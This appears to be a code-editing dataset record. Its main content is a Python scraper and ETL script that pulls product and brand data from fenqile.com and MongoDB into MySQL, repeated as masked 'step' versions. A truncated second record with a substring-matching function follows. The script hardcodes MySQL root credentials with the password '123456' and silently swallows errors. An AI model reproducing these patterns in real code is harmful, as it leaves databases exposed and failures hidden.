create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import json
import datetime
import requests
import pymysql
import pymongo
def insert_category(conn):
"""将商品的种类插入数据库 """
# 商品种类的 id 和对应的名称
categories_dict = {
66: "手机",
327: "腕表配饰",
65: "电脑办公",
67: "相机单反",
217: "平板数码",
179: "运动户外",
255: "家电家居",
1000: "其他",
}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = "insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)"
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
result = cursor.execute(sql, (category_id, category_name, create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = "https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}"
res = requests.get(brand_url.format(category_id=category_id))
# 所有的brand字典组成的列表
brands = json.loads(res.content.decode("utf-8")).get("brand_list")
brand_list += brands
except:
print("出错了:category_id:", category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en', 'category_id_1']
sql = "insert into goods_brand values (%s, %s, %s, %s, %s, %s)"
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get("brand_id"))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
brand_name = brand.get("brand_name")
brand_name_ch = brand.get("brand_name_ch") if brand.get("brand_name_ch") else brand_name
brand_name_en = brand.get("brand_name_en") if brand.get("brand_name_en") else brand_name
category_id = int(brand.get("category_id_1"))
category_id = category_id if category_id in category_id_list else 1000
# 插入数据库
result = cursor.execute(sql, (brand_id, create_time, brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
# 加入去重队列
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
# 数据库中的所有的字段 22 个
kws = ("product_name", "category_id_1", "brand_id", "product_desc",
"short_product_name", "sku_key_1", "sku_key_2", "sku_key_3", "product_flag",
"min_firstpay", "is_product_up_down", "real_amount", "mart_amount", "fq_num",
"product_info", "delivery_time", "gift_list", "fe_params", "slider_imgs",
"detail_imgs", "create_time")
# 插入除 商品 id 之外的字段
# sql = "insert into goods () values (%s, %s, %s, %s, %s, " \
# "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql = "insert into goods (good_name,category_id,brand_id,product_name,short_product_name," \
"sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount," \
"mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs," \
"create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
# 获取mongodb 中的数据
goods = GOODS.find()
for good in goods:
try:
data = []
# 商品 id 去重集合
# good_id_set = set()
for kw in kws[:-5]:
info = good["detail_data"].get(kw)
data.append(info)
# 单独处理复杂的项目
gift_list = " ".join([str(s) for s in good["detail_data"].get("gift_list")[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good["detail_data"].get("fe_params"))
data.append(fe_params)
slider_imgs = "||".join(good["slider_imgs"])
data.append(slider_imgs)
detail_imgs = "||".join(good["detail_imgs"])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, "%Y-%m-%d %H:%M:%S")
data.append(create_time)
# 判断 id 是否重复
# if good["good_id"] not in good_id_set:
with conn.cursor() as cursor:
cursor.execute("select brand_id from goods_brand")
# 查出所有的品牌 id
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute("select category_id from goods_category")
# 查出所有的种类 id
all_category_ids = [category_id[0] for category_id in cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(data[2])
cursor.execute(sql, tuple(data))
conn.commit()
# good_id_set.add(good["good_id"])
except Exception as e:
print(e)
continue
def main():
# MySQL 连接
conn = pymysql.connect(host="127.0.0.1", port=3306, user="root", password="123456",
db="test", charset="utf8", autocommit=False)
# 将分类插入数据库
# insert_category(conn)
# 将品牌插入数据库
# insert_brand(conn)
# 将商品插入数据库
# mongodb 连接
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN["fenqile"]["goods"]
insert_goods(conn, GOODS)
conn.close()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "b69e3f5e57adc8e89b6ff22fb4a10d2539e13ca3",
"index": 7200,
"step-1": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import json\nimport datetime\nimport requests\nimport pymysql\nimport pymongo\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):\n '相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = (\n 'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'\n )\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n result = cursor.execute(sql, (category_id, category_name,\n create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = (\n 'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'\n )\n res = requests.get(brand_url.format(category_id=category_id))\n brands = json.loads(res.content.decode('utf-8')).get('brand_list')\n brand_list += brands\n except:\n print('出错了:category_id:', category_id)\n print()\n continue\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',\n 'category_id_1']\n sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get('brand_id'))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'\n )\n brand_name = brand.get('brand_name')\n brand_name_ch = brand.get('brand_name_ch') if brand.get(\n 'brand_name_ch') else brand_name\n brand_name_en = brand.get('brand_name_en') if brand.get(\n 'brand_name_en') else brand_name\n category_id = int(brand.get('category_id_1'))\n category_id = (category_id if category_id in\n category_id_list else 1000)\n result = cursor.execute(sql, (brand_id, create_time,\n brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',\n 'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',\n 'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',\n 'mart_amount', 'fq_num', 'product_info', 'delivery_time',\n 'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')\n sql = (\n 'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'\n )\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n for kw in kws[:-5]:\n info = good['detail_data'].get(kw)\n data.append(info)\n gift_list = ' '.join([str(s) for s in good['detail_data'].get(\n 'gift_list')[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good['detail_data'].get('fe_params'))\n data.append(fe_params)\n slider_imgs = '||'.join(good['slider_imgs'])\n data.append(slider_imgs)\n detail_imgs = '||'.join(good['detail_imgs'])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')\n data.append(create_time)\n with conn.cursor() as cursor:\n cursor.execute('select brand_id from goods_brand')\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute('select category_id from goods_category')\n all_category_ids = [category_id[0] for category_id in\n cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]\n ) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(\n data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',\n password='123456', db='test', charset='utf8', autocommit=False)\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN['fenqile']['goods']\n insert_goods(conn, GOODS)\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\nimport json\nimport datetime\n\nimport requests\nimport pymysql\nimport pymongo\n\n\ndef insert_category(conn):\n \"\"\"将商品的种类插入数据库 \"\"\"\n # 商品种类的 id 和对应的名称\n categories_dict = {\n 66: \"手机\",\n 327: \"腕表配饰\",\n 65: \"电脑办公\",\n 67: \"相机单反\",\n 217: \"平板数码\",\n 179: \"运动户外\",\n 255: \"家电家居\",\n 1000: \"其他\",\n }\n with conn.cursor() as cursor:\n for category_id, category_name in categories_dict.items():\n sql = \"insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)\"\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n result = cursor.execute(sql, (category_id, category_name, create_time))\n conn.commit()\n\n\ndef insert_brand(conn):\n \"\"\"将商品的品牌插入数据库\"\"\"\n brand_list = []\n category_id_list = [66, 327, 65, 67, 217, 179, 255]\n for category_id in category_id_list:\n try:\n brand_url = \"https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}\"\n res = requests.get(brand_url.format(category_id=category_id))\n # 所有的brand字典组成的列表\n brands = json.loads(res.content.decode(\"utf-8\")).get(\"brand_list\")\n brand_list += brands\n except:\n print(\"出错了:category_id:\", category_id)\n print()\n continue\n\n key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en', 'category_id_1']\n sql = \"insert into goods_brand values (%s, %s, %s, %s, %s, %s)\"\n with conn.cursor() as cursor:\n brand_set = set()\n for brand in brand_list:\n brand_id = int(brand.get(\"brand_id\"))\n print(brand_id)\n if brand_id not in brand_set:\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n brand_name = brand.get(\"brand_name\")\n brand_name_ch = brand.get(\"brand_name_ch\") if brand.get(\"brand_name_ch\") else brand_name\n brand_name_en = brand.get(\"brand_name_en\") if brand.get(\"brand_name_en\") else brand_name\n category_id = int(brand.get(\"category_id_1\"))\n category_id = category_id if category_id in category_id_list else 1000\n # 插入数据库\n result = cursor.execute(sql, (brand_id, create_time, brand_name, brand_name_ch, brand_name_en, category_id))\n print(result)\n conn.commit()\n # 加入去重队列\n brand_set.add(brand_id)\n\n\ndef insert_goods(conn, GOODS):\n \"\"\"将商品信息插入数据库\"\"\"\n # 数据库中的所有的字段 22 个\n kws = (\"product_name\", \"category_id_1\", \"brand_id\", \"product_desc\",\n \"short_product_name\", \"sku_key_1\", \"sku_key_2\", \"sku_key_3\", \"product_flag\",\n \"min_firstpay\", \"is_product_up_down\", \"real_amount\", \"mart_amount\", \"fq_num\",\n \"product_info\", \"delivery_time\", \"gift_list\", \"fe_params\", \"slider_imgs\",\n \"detail_imgs\", \"create_time\")\n # 插入除 商品 id 之外的字段\n # sql = \"insert into goods () values (%s, %s, %s, %s, %s, \" \\\n # \"%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n sql = \"insert into goods (good_name,category_id,brand_id,product_name,short_product_name,\" \\\n \"sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,\" \\\n \"mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,\" \\\n \"create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n # 获取mongodb 中的数据\n goods = GOODS.find()\n for good in goods:\n try:\n data = []\n # 商品 id 去重集合\n # good_id_set = set()\n for kw in kws[:-5]:\n info = good[\"detail_data\"].get(kw)\n data.append(info)\n # 单独处理复杂的项目\n gift_list = \" \".join([str(s) for s in good[\"detail_data\"].get(\"gift_list\")[-1].values()])\n data.append(gift_list)\n fe_params = json.dumps(good[\"detail_data\"].get(\"fe_params\"))\n data.append(fe_params)\n slider_imgs = \"||\".join(good[\"slider_imgs\"])\n data.append(slider_imgs)\n detail_imgs = \"||\".join(good[\"detail_imgs\"])\n data.append(detail_imgs)\n t = datetime.datetime.now()\n create_time = datetime.datetime.strftime(t, \"%Y-%m-%d %H:%M:%S\")\n data.append(create_time)\n # 判断 id 是否重复\n # if good[\"good_id\"] not in good_id_set:\n with conn.cursor() as cursor:\n cursor.execute(\"select brand_id from goods_brand\")\n # 查出所有的品牌 id\n all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]\n cursor.execute(\"select category_id from goods_category\")\n # 查出所有的种类 id\n all_category_ids = [category_id[0] for category_id in cursor.fetchall()]\n data[1] = data[1] if data[1] else 1000\n data[2] = data[2] if data[2] else 10000\n data[1] = 1000 if int(data[1]) not in all_category_ids else int(data[1])\n data[2] = 10000 if int(data[2]) not in all_brand_ids else int(data[2])\n cursor.execute(sql, tuple(data))\n conn.commit()\n # good_id_set.add(good[\"good_id\"])\n except Exception as e:\n print(e)\n continue\n\n\ndef main():\n # MySQL 连接\n conn = pymysql.connect(host=\"127.0.0.1\", port=3306, user=\"root\", password=\"123456\",\n db=\"test\", charset=\"utf8\", autocommit=False)\n # 将分类插入数据库\n # insert_category(conn)\n # 将品牌插入数据库\n # insert_brand(conn)\n # 将商品插入数据库\n # mongodb 连接\n CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)\n GOODS = CONN[\"fenqile\"][\"goods\"]\n insert_goods(conn, GOODS)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_all_lefts(word, substring):
if len(substring) == 0:
yield (len(word), word),
elif substring[0] not in word:
yield -1,
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):
yield (i, word[:i]), *sub_sequance
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_all_lefts(word, substring):
if len(substring) == 0:
yield (len(word), word),
elif substring[0] not in word:
yield -1,
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):
yield (i, word[:i]), *sub_sequance
if __name__ == '__main__':
word = input('')
substring = input('')
maxNum = 0
for lefts in map(list, get_all_lefts(word, substring)):
if -1 in lefts:
continue
print(lefts)
print(maxNum)
<|reserved_special_token_1|>
def get_all_lefts(word,substring):
if len(substring) == 0:
yield ((len(word),word),)
else:
if substring[0] not in word:
yield (-1,)
else:
for i in range(len(word)):
if word[i] == substring[0]:
for sub_sequance in get_all_lefts(word[i+1:],substring[1:]):
yield ((i,word[:i]),*sub_sequance)
if __name__ == '__main__':
word = input('')
substring = input('')
maxNum = 0
for lefts in map(list,get_all_lefts(word,substring)):
if -1 in lefts:
continue
print(lefts)
print(maxNum)
|
flexible
|
{
"blob_id": "8c0377b70b902e6e61351869a4378b4c2c50a3a7",
"index": 2478,
"step-1": "<mask token>\n",
"step-2": "def get_all_lefts(word, substring):\n if len(substring) == 0:\n yield (len(word), word),\n elif substring[0] not in word:\n yield -1,\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):\n yield (i, word[:i]), *sub_sequance\n\n\n<mask token>\n",
